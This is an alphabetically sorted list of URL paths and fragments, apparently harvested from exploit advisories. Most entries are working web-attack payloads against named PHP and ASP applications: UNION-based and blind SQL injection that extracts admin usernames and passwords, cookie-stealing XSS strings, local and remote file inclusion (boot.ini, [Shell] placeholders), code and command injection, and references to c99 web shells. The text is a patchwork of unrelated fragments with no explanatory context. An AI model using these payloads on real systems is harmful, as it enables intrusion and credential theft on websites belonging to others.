BlogPHPv2
blog.php?view=news&id=9999%27union
blog.pouya.info
blogroll.php?delete=[LINK ID]
blogroll.php?edit=[BLOGROLL ID]
blogroll.php?new=entry
blog_rss?bID=30&cID='&arHandle=Main
blogs
blog.s9y.org
blog.sebastian-thiele.net
blogsecurity.net
blog.sitewat.ch
_blogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
blogsmanager
blogsystem
/?blog=test&permalink=..
" + blogURL + "
" + blogURL + request
blogworx
blogworx1.0
blogwrite-0.91
blogwriter
blog.xrobot.mobi
blog.y-shahinzadeh.ir
blondish.net
bloofoxCMS_0.3
bloofoxCMS_0.3.4
blrasia.htm
blue
bluebird
blueeyecms
blue_eye_cms-1_0_0_preRC.rar
blue_eye_cms-1_0_0_preRC.rar".
blueflyingfish.no-ip.biz
blueh4g.org_
blueh4g.org)
bluePRINTs
blueshisha.mutebox.net>
[BlueShoes_path]
blue-spy.net
bluevirus
bluevirus.ch
blur6ex
blur6ex-0.3.462
bm
bmachine2
 -bmark 5:4000000\n";
bmb
bmc
bmc_users
bncwi
bnnr.php>
board
board_member
_BOARD_PATH_
board.php?board=agcmain&category=10 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--
board.php?board=boarname&category=[SQL Line]
board.php?board=consult&command=skin_insert&exe=insert_down_shop
board.php?board=freeboard&sort=(case%20("
board.php?board=skinmarket&category=11 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61--
board.php?FID=1[SQL]
board.php?FID=2%20<something>
board.php?FID=%3Cscript%3Ealert(document.cookie)%3C
board.php?id=6[get union columns&USERS'] (-sqlinjection)
board.php?id=grblog&articleNo=43
board.php?id=X[SQL INJECTION]
boards
boards.4chan.org
boards_rss.php";
boards_rss.php?version=
boats
bobsta63
<body>
body><
body> <
body>  <
body%3E%3C
body.asp
body.asp?action=newfile
body.asp?action=savefile&path=
body_comm.inc.php?content=[SHELL]    
bodycopy
body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]
body_header.inc.php?section=[file]%00
body><html>
"><body onload="javascript:alert(document.cookie);qabandi" 
body.php?GLOBALS[where_framework]=[cmd_url]
"><body<script> <script>on<script>loa<script>d="javascript:alert(document.cookie);qabandi" 
body>&sess=daf5c642ade1162f15c4eb4b7e89da17
bodyTemplate.php?serverPath=Sh3ll ?
bo_hard
bohyn.czechweb.cz
bolum.php?id=[SQL]
b> on
Bonsai-OS_Command_Injection_in_Cacti.pdf
Bonsai-SQL_Injection_in_Cacti.pdf
bon_suite.php?lang=
bonzacart
book
book.curl.php\n\n";
booking
booking-a-reservation
booking_calendar.html
booking-form.php?modelid=13'[SQL]
booking_report.php?rghtMenu=rghtMenu3&AND+1=1[BLIND SQL-INJECTION]
booking_report.php?rghtMenu=rghtMenu3&[BLIND SQL-INJECTION]
booking_report.php?rghtMenu=rghtMenu3&orderby=-1%27[SQL-INJECTION]
booking_report.php?rghtMenu=rghtMenu3&[SQL-INJECTION]Union+select+1,2,3,4,5...30--%20-
bookings.php?page=[CROSS SITE SCRIPTING]
BookLibrary
BookLibrary-search-Books-module-version-2.0
bookmark
[Bookmark4Upath]
bookmarker
bookmarker_backend.php?pagebm=mfolders&Parent=-99999
bookmarks
bookoo_ii.php%00&u=bookoo&p=password
bookoo_ii.php?cmd=ls
bookoo.php%00
book_panel
book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
books
books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--         +
books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--     +
boonex-dolphin
boot
boot.ini
boot.ini 
boot.ini%00
boot.ini%00.html
boot.ini%00.html&function=login
boot.ini%00 HTTP
boot.ini%00&id=-1_tsearch_len
boot.ini%00.jpg
boot.ini%00.jpg&function=login
boot.ini%00&lid=
boot.ini%00&op=lostpwd
boot.ini%00&p=index.html
boot.ini%00&p=index.html HTTP
boot.ini&op=fileviewer
BOOTSECT.BAK
bootsect.bak%00
BOOTSECT.BAK%00
bosclass
bot.html)');
bot.html)",
bot.html)\n";
bot.html)\r\n";
_bot.php?master[currentskin]=[AvriLhea]                                   ||
bottom.php?style=..
boukan
boutique
box_display.php?box=..
box_display.php?box=[LFI]
boxes
Boxes.php?SES_ID=5f97b23814644739be5ac2d335773753&box=1
box.inc.php?config[sipssys]=[SHELL]
b.php
b.php?id=-1
bpmusic
bpmusic										    |
bpowerhouse.info
bpowerhouse.info		     	|
bpowerhouse.info											    |
bpstudentsDemo
branches
breadcrumb
breadcrumb.class.php?system_path=[evil_scripts]
breaking_news.php?newsid=-103+UNION+SELECT+1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login--
breaking_news.php?newsid=union select 1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login
brettjenkins.co.uk
brewblogger
BrewBlogger
BrewBlogger%202.3.2
brewblogs.list.php
brewer.add-edit.php
brewerlinks.add-edit.php
brewerlinks.list.php
brewingcss.add-edit.php
brewingcss.list.php
brewthology
brewthology.png
bridgeofhope
bridges
brim
brindi.si
brindi.si%27"><script>alert(document.cookie)<
\"):<br><input type='text' size='25' name='url'><br><br>Table Prefix:<br>". add_html_space(1) ."<input type='text' size='20' name='prefix' value='gllcts2'><br><br><input type='submit' value='Get Admin Info'><
broadcastmachine
brochure.php
brokenfile.php?lid=17'
brokenfile.php?lid=1+and+1=0 HTTP
brokenfile.php?lid=1+and+1=1 HTTP
brokenfile.php?lid+DSecRG_INJECTION
brokenlink.php?lid=2+DSecRG_INJECTION
browse
BrowseAccountsPage.class.php?base_path=[evil_scripts]
browse-add-ons.php?id=0E8BC37
browse_avatar.php Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[-1] Mime Type[text
browse_avatar.php?site=localhost]
browse_avatar.php?site=localhost HTTP
browse&category=aaa' and 1=1 -- aaa
browsecats.php?cid=2'
browsecats.php?cid=2+union+select+1,version(),3,4--
browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
browsecats.php?cid=6[CODE]
browsecats.php?cid=[sql]
browsecats.php?cid=[sql cod]                    #
browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
browse.html?cat=-9999+union+all+select+1,2,version(),4,5,6--
browse.html?cat=[SQLi]
browse.ihtml?step=4&store=1[SQL]
browse.ihtml?step=4&store=42&id=[SQL]
browse.ihtml?step=[SQL] 
BrowseInvoicesPage.class.php?base_path=[evil_scripts]
browse.php
browse.php?cat=[code]
browse.php?fid=3&tid=46&go=<script>JavaScript:alert('test');<
browse.php?folder=1'
browse.php?folder=-1+union+select+1,version(),3,4,5,6--
browse.php?gfcommon=[Shell]
browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1
browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers--
browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers--	
browse.php?lan=[darkcode]						[»]
browse.php?loginname=whocares&parent=1&expand=1&order=creatorid&sortposted=ASC 
browse.php?mod=find&keywords='%3E%3Cscript%3Ealert('test');%3C
browse.php?pcat=[sqli]
browse.php?pk=-1 union select @@version,2--
browse.php?SearchIndex=1>"><ScRiPt %0D%0A>alert(412646446896)%3B<
browse.php?SearchIndex=PCHardware&BrowseNode=3221551&sort=psrank&Go=Submit and 1=1 TRUE
browse.php?SearchIndex=PCHardware&BrowseNode=3221551&sort=psrank&Go=Submit and 1=2 FALSE
browse.php?SearchIndex=PCHardware&BrowseNode=[NB]&sort=psrank&Go=[bSQL]
browse.php?type=images&lng=en&act=download HTTP
browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1
browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1
browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
browse.php?wherecatin=waraxe
browse_products.php
browseproject.php?mode=pdetails&pid=-1
browser
browser.html
browser.html	
browser.html?connector=..
browser.html?Connector=connectors
browser.html?Type=&Connector=http%3A%2F%2F##www.site.com##%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
browser.html?Type=File&Connector=connectors
browser.php?directory=[ATTACKER_SPECIFIED_PATH]
browser.php?file=inc
browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings
browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users
browse_task.php?gfcommon=[Shell]
browse.videos.php?category=-1
browse_videos.php?cat=&n='1
browse_videos.php?cat=&n=1'<ScRiPt >prompt(959580)<
BrudaGB_v11
brunetton.tuxfamily.org
bsadv.sourceforge.net
bsd-license.php)
bsd-license.php New BSD License
Bs_Faq.class.php?APP[path][applications]=[evil_scripts]
Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]
bs_login.asp?btnAction=cSaveAdminPW" method="post">
bs_login.asp?btnAction=saveAdmin" method="post">
bs_login.asp?btnAction=saveDesign" method="post">
Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]
BSp
bspeakdemo
BSQL]
Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]
btdownload.php?file=<script>alert(document.cookie)<
bu
bubla
buddy-zone-social-networking-script.html
budget.php?Modus=Detail&ID=5+AND+0+UNION+ALL+SELECT+1,database(),user(),4,5,6,7,8
budget.php?Modus=Detail&ID=5+AND+0+UNION+ALL+SELECT+1,SuUser,SuPwd,4,5,6,7,8+FROM+sysuser+WHERE+SuID=1
budget.sqlite
budget.sqlite%00
+bug
bug32571
bug-559668.php?FORUM[LIB]=<script>alert(document.cookie)<
bug-fix
BugMallPAth
bug.php?id=4692
bug.php?op=viewvotes&bugid=[SQL]
bug.php?op=vote&bugid=[SQL]
bug.php?r=514&p=3 -get \"
bugreporter
bugreport.ir
BugReport.ir
bugs
Bugs
bugsec
bugs.efrontlearning.net
bugs.html
bugs.launchpad.net
bug_sponsorship_list_view_inc.php?
bugs.sitracker.org
bugs.typo3.org
bugs_y_exploits
bug-tracking.
bugtraq
build
builddb.php?env_dir=shell
build the http request to Inject a query:
bukle.htm
bukle.htm&enviar
bukutamu.php?det=-1
bulkcrawl.php
bulletinboard
bulletinboard.class.php?system_path=[evil_scripts]
bulletins
bundle.php
bureau.class.php?path_om=[Shell]
Bu-resimde-hem-essek-hem-fok-bal%C4%B1g%C4%B1-gizli-120x120.jpg">	
burnedcake.py for a working POC exploit.
business
businesscard
business_comm_download.html
businesscommunity
businessdirectory
Business_Directory
businessdirectoryadmindemo
business-directory.html ]
business_inc
businesswiki
busqueda
busqueda.php?cadena='+[SQL]
busqueda_tema.php?id_temas=-1+[SQL]
, but here we have a more    #
 (but previously you gotta log in as administrator on website)#
butterfly
buttons
button_submit.gif"
" but we can include remote file using ftp:
buy1.php?category=11&place="><script>alert(document.cookie);<
buy_do_search
buyer
buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--
buyers_subcategories.php?IndustryID=[SQL]
buy_guestbook.php
buynow.html
buynow.inc.php?install_root=[Shell]
buyoffers.php?cid=[SQL]
buy.php (Creat A new)
buyupg.php?upg=2
BuzzyWall.v1.3.1.Nulled.rar.html
bx67212.netsons.org
bxr )
BX_ROOT
by-nc-sa
bypass-za-pomoca-sql-wpquiz-vt4278.htm
    By  Qabandi             \QQQQ|
bytehoard
*&byuser=&searchin=submess
 by your vulnerable site
c
c086978f6a91eacb339fd2976202fca9dad2ef32
c0BidW4=
c0li.info
c12
/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
c3b1ee3
 -c=400000\n";
c4f.pl) ;				          		 
c4f.pl) ;				          		 #
c4team.org
c4team.org 
c5068b7c2b1707f8939b283a2758a691 .
c5f27bf66a7f35bd3daeb5f693f3e2493f51b1f3
c6
c6b4b5e
c7
c8751a3c9ad8970b49d1bf882203efacd10af087
c99.php
c99.php>
c99.php?
c99.php?" 
c99.php (2 Find Ev!l)
c99php3txt.php3
c99.php.rar
c99.php\r\n";
c99.php ==>>> your address
c99shell.php)
ca_annee.php?lang=
ca_annee.php?lang=..
cabron.sourceforge.net
cabs
cac-featured-content
cache
cached.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
cachelogic.net
cache_mngt.php?root_path=[evil_scripts]
cache.php
Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
cacti
cacti-0.8.7e
CACTIHOST
cacti.net
cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members
cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)<
cadena_ofertas_ext.php?OfertaID= [sql]
cadre
caesar.php
cagcms
CAGCMS%200.2
/?calbums=1+and+1=1-- <Blind SQLi>
/?calbums=1+and+31337-31337=0+--+
/?calbums=-2 union select 0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13 from admin--
cal_cat.php?op=cat&id=1&year=2010&sort=&catmonth=6&catview=0&limit=[SQL]
cal_cat.php?op=cats&catview=999'[sql]*
calcFormVar.lib.php
calc.php
calculations.lib.php
calDaily.php?font="><script>alert('LOL')<script><"
cal_day.php?op=day&catview=-2%20union%20all%20select%20concat_ws%280x3a,username,0x3a,password,0x3a,email,0x3a,url%29%20from%20calendarix_users--
cal_day.php?op=day&catview=-2%20union%20all%20select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=0x63616c656e64617269785f7573657273--
cal_day.php?op=day&catview=-2 union all select group_concat(table_name) from information_schema.tables where table_schema=database()--     
cal_day.php?op=day&date=2005-05-03&catview=1[sql]
cal_default.php
calendar
[calendar]
Calendar
calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell
calendar.admin.php?cal_id=0&language=english
calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search
calendar.asp?DoAction=Calendar&Q_DATE=11
CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')<
calendar.asp?DoAction=USER&Change=LOGINFORM
calendar_backend.php?pageec=dayview&month=2&year=-1[SQL]
calendar_download.php?calendar=[query]
calendarexpress
calendarexpress2.1
calendar-express-2.rar
calendar_functions.html.php
calendar_functions.php
calendario
calendar.php
calendar.php3?menu=detail&cal_id=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users
calendar.php?action=today&day=1&month=<iframe>
calendar.php?action=today&day=1&month=jan&year="><iframe>
calendar.php?action=today&day=<iframe>
calendar.php?baseDir=[REMOTE INCLUDE]
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22
calendar.php?Cat=7&month=6&year=2005[SQL]
calendar.php?Cat=&month=7[SQL]&year=2005 
calendar.php?display=event&id=[SQL]
calendar.php?display=event&id=[SQL] 
calendar.php?idfestival=7 (SQL)
calendar.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
calendar.php?login=1' will allow unauthenticated
calendar.php?mode=cat&cat_id=[SQL.i]
calendar.php?month=12&year='[SQL]
calendar.php?mth=3&yr=2006"><script src=
calendar.php?obj=view.year&month=2&date=21&year=2008<script>alert(document.cookie)<
calendar.php?op=cal&month=3&year="><script>alert(
calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
calendar.php?op=cal&month="><script>alert(
calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(
calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(
calendar.php?_SERVER[DOCUMENT_ROOT]=
calendar.php?token='UNION
calendar.php?type=day&calendar=
calendar.phptype=day&calendar=&category=&day=25&month=11&year=[SQL]
calendar.php?vwar_root=[Shell-code]?&cmd=ls
calendar.php?week="><script>alert(&#039;test!&#039;)<
calendar.php' will redirect the
calendar.php?year=Inject HTML Code here.
calendar.php?year=<script>alert(document.cookie);<
calendars
calendars-a-events
calendar_scheduler.php?start=%22%3E%3Cscript%3Ealert(document.cookie)%3C
calendarscripts.info
calendars-&-events
Calendar-Systems
calendar.tpl.php?CFG[skin]=..
calender
calendre
calendrier.php?cal[lng]=[LFI]
calendrier.php?mois=6&annee="><script>alert(document.cookie)<
cal.func.php?dir_edge_lang=[SHELL]
cal_insert.php?CLASSPATH=[AvriLhea]                                                                
callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1
callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_name,5,6,1905+from+fusion_users
callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_password,5,6,1905+from+fusion_users
calldiary.php?callref=VULN 
call_file.php?ajax_file=service_list.php&debug=yes
callme_page.php?action=c&callmenum='+str(extension)+'@from-internal
Calls
calMonthly.php?font="><script>alert('LOL'<
calMonthlyP.php?font="><script>alert('LOL')<
calmpc.net
cal_pdf.php?thefile=
cal_pophols.php?id=999'[sql]
cal_popup.php?extmode=view&extid=[BLIND_SQL]
cal_popup.php?mosConfig_absolute_path=[INDONESIANCODER]
cal_saveactivity.php?CLASSPATH=[AvriLhea]
cal_save.php?CLASSPATH=[AvriLhea]
cal_search.php" method="post" enctype="multipart
calWeekly.php?font="><script>alert('LOL')<
calWeeklyP.php?font="><script>alert('LOL')<
cal_week.php?op=week&catview= 999'[sql]
calYearly.php?font="><script>alert('LOL')<
calYearlyP.php?font="><script>alert('LOL')<
camera
cameralife
CampaignLog
Campaigns
campaign_stats.php?id=<SQL C0de>                #
CampaignTrackers
camp_html.php?GLOBALS[g_campsiteDir]=[SHELL]
campsite
Campsite.htm?tpl=18
campusvirtualcomputrade.cae.net
camyuva.bel.tr
cannot.info
captcha
captcha_bypass.php?ts_random=54771854
captcha_image.php?
captcha_image.php?img=[LFI]%00
captcha.php?aFonts[]=
Captcha.php?characters=3&len=1
captcha_settings HTTP
capturethecookies.php?ck=
capu87.ca.funpic.de
card
cardealer
cardealers
cards
career
[career]
caricatier
carlister
carnet.php?view_cat=2&nbr_line_view=[sql]
carnet.php?view_cat=&all_lines=true&motclef=[sql]
carousel-flash-image-gallery.html
carprss.php?CarpPath=[Evil_Code]
cars
cars_images
carsportal
cart
Cart
cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='
cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
cart&func=cartAdd&product_id=321&
cart.php?action=;phpinfo();
cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}
cart.php?act=reg&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZh
cart.php?a=test&templatefile=..
cart.php?a=[wrong_value]&templatefile=[LFD]%00
cart.php?chckoutaction=1&ckprvd=%22%3E%3Cscript%3Ealert(document.cookie)%3C
cart.php?cmd=add&asin=[shell]
cart.php?message1='><script>alert(document.cookie) <
cart.php?message='><script>alert(document.cookie)<
cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7
cart.php?nReferrer=';<
cart.php?_saz[settings][shippingfolder]=HTTP:
cart.php?shopping_cart&add2cart=10 
cart.php?shopping_cart&add2cart=10'
cart.php?target=category&category_id=9999)union
cart_save.php
cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>alert("VULN");<
cartwiz
casavie.net
case
case.adminfaq.php
case.php?currentlang=[Lfi]%00
Cases
casino_player_edit.php?player=war'axe
casting_view.php?adnum=[SQLi]
casus.php?" 
 \"cat 
 cat .
cat=0"><script>alert('foo')<
cat1.php?catID=
cat1.php?catID=-999+union+all+select+1,version(),database()--
cat1.php?catID=<font color=red size=15>XroGuE<
cat1.php?catID=[SQL
cat1.php?catID=[SQL]
*&cat=2
cat-2
cat%20
cat2.php?catID=
cat2.php?catID=<font color=red size=15>XroGuE<
cat2.php?catID=[SQL
cat2.php?catID=[SQL]
 -cat 2 -uid 1 -pre phpkit                     |\n";
cat3.php?catID=
cat3.php?catID=<font color=red size=15>XroGuE<
cat3.php?catID=[SQL
cat3.php?catID=[SQL]
cat4.php?catID=
cat4.php?catID=<font color=red size=15>XroGuE<
cat4.php?catID=[SQL
cat4.php?catID=[SQL]
cat5.php?catID=[SQL
cat5.php?catID=[SQL]
cat6.php?catID=[SQL
cat6.php?catID=[SQL]
catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin
catalog
catalog2.php?g_id=[SQLi]
catalog.ajaxhandler.php?language=[LFI]
CatalogManager
catalog_Options.html.php
catalog_Options.php
catalog.php
catalog.php?action=
catalog.php?action=category_show
catalog.php?catalogid="><script>alert(document.cookie)<
catalog.php?front_latestnews="><script>alert(document.cookie)<
catalog.php?front_searchsubmit="><script>alert(document.cookie)<
catalog.php?idp=1'union select 1,2,password,username,5,6,7,8 from smeweb_user where userid=1 ORDER BY counter
catalog.php?viewdomain=now&id=1' (MySQLi Found)
catalogsearch
catalogue.php";
catalogue.php?cat=-99
catalogue.php?id_shop=7[SQLI]
catdb.php?mode=download&id=1988012
categoria.php
categoria.php?cod_categoria=1 and 1=1 <= TRUE
categoria.php?cod_categoria=1 and 1=2 <= FALSE
categoria.php?cod_categoria=[BLIND]
categoria.php?cod_categoria="><script>alert(document.cookie);<
categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--
categorie.class.php?path_om=[Shell]
categorie.class.php?path_om[Shell]
categorie_donnee.class.php?path_om=[Shell]
categorie_personne.class.php?path_om=[Shell]
categories
categoriesblogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
Categories.html.php
categories.inc.php?install_root=[Shell]
categories.inc.php?subpage=..
categories.php
Categories.php
categories.php?Cid='
categories.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271
categories.php?id=[SQL]
categories.php?parent=&start=&orderField=itemname&orderType =1'[SQL]
categories.php?path_faqe=[INDONESIANCODER]
categories.php?selcat=25(SQL)
categories.php?theme=..
categories_type.php?cat=-1
category
category=..
/?category=100
categoryaddon
category.db.php
category-delete.php?tablehere=[NAME OF CATEGORY]&is_js_confirmed=1
categorydetail.php?catid=1'AND 1=1
categorydetail.php?catid=1'AND 1=2
category_edit.php?cid=1+[SQL-INJECTION]order+by+1x--%20- width=800 height=800>
categoryedit.php?id=%27
categorygigs.php?category=-0+UNION+SELECT+1,version(),3,4,5,6,7--
categorygigs.php?category=&mny=-100+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11--
category-grid-view-gallery
category_handler.php?gfplugins=[Shell]
category?id=1"."%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."User"."%20LIMIT%20"."$r".",1"."),"."$i".",1)=CHAR("."$n".")";
/?category_id=zzz'+UNION+SELECT+1,@@version%23
category.jsp
_category_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
category_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
category_list.php?cid=-1
category-list-portfolio-page
CategoryManager
 [category parameter]
category.php
category.php?action=..
category.php?action=view&id=[SQL] 
category.php?cat=-1
category.php?cat=-1+union+all+select+1,@@version,3,4,5
category.php?cate_id=1 << and 1=0
category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--
category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3+from+admin--
category.php?cat_id=3%20and%201=0%20union%20select%200,1,user(),3,4,5--
category.php?cat_id=3%20and%201=0%20union%20select%200,1,version(),3,4,5-- (V 4 :) )
category.php?cat=search&search=[SQL] 
category.php?cat=[sqli]
category.php?cat=s'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,id,Username,Password)+from+class_users
category.php?  cat=s'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,id,Username,Password)+from+demo_users
category.php?cid=-12
category.php?cname=[SQL]
category.php?gfplugins=[Shell]
category.php?id=9%20and%201%20div%202%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29,3
category.php?id=-99%20union%20select%20name,name,name,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin
category.php?id=-999
category.php?id=-999 union select name from flinx_cat--
category.php?id=concat(user,0x203a3a20,password)
category.php?IndustryID=18+union+select+1,2,database()--
category.php?IndustryID=18+union+select+1,2,user()--
category.php?IndustryID=18+union+select+1,2,version()--
category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=4 <= false
category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=5 <= true
category.php?IndustryID=25 and 1=1 <= true
category.php?IndustryID=25+and+1=1+union+select+1,2,database()--
category.php?IndustryID=25+and+1=1+union+select+1,2,user()--
category.php?IndustryID=25+and+1=1+union+select+1,2,version()--
category.php?IndustryID=25 and 1=2 <= false
category.php?IndustryID=(Blind) or (SQL)
category.php?IndustryID=[SQLI]
category.php?message=<script>alert(document.cookie);<
category.php?scid=1&category_id=-99%20union%20all%20select%20null,concat(username,0x20,0x3a,0x20,userpass),0%20from%20admin
category.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5
category.php?view=list&cate_id=[BLIND]
category_quotes.php?ID=9' (MySQLi Found)
categorysearch.php?cid=[sqli]
category=[sqli] 
/?category=xxxxxx&parent=0&page=x&
cat_for_aff.php?ad_direct=..
cat_for_gen.php?ad=1&ad_direct=..
catgrp.php?xGrp=[SQLi]
/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--
catid,26
".$cat_id{"p"});
catogary.php?catid=[SQL]
cat.php?cat=2' (Sql)
cat.php?CatID=-1
cat.php?catname="><script>alert(
cat.php?cat=[sql injection]
cat.php?c=<br>jiko <script>alert(11)<
cat.php?do=cat&page=1&id=[SQL]
cat.php?do=cat&page=[SQL]
cat.php?id=-3+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4+from+user
cat.php?idcat=1
cat.php?ID=[SQLi]
cat.php?nb=-1'
cat.php?nb=1><script>alert(document.cookie)<
cat.php?sFileName=
cat.php?sFileName=a%3Benv
cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+sbbleads_admin--
cat_sell.php?cid=-7+union+select+1,version%28%29,3,4,5,6,7,8--
cat-sieges-31.html?tri=reference+and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%280x7e,0x27,cast%28table_name%20as%20char%29,0x27,0x7e%29%20FROM%20information_schema.tables%20Where%20table_schema=0x7065656C5F7072656D69756D%20limit%200,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
cat-sieges-31.html?tri=reference+and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%280x7e,0x27,cast%28table_name%20as%20char%29,0x27,0x7e%29%20FROM%20information_schema.tables%20Where%20table_schema=0x7065656C5F7072656D69756D%20limit%201,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
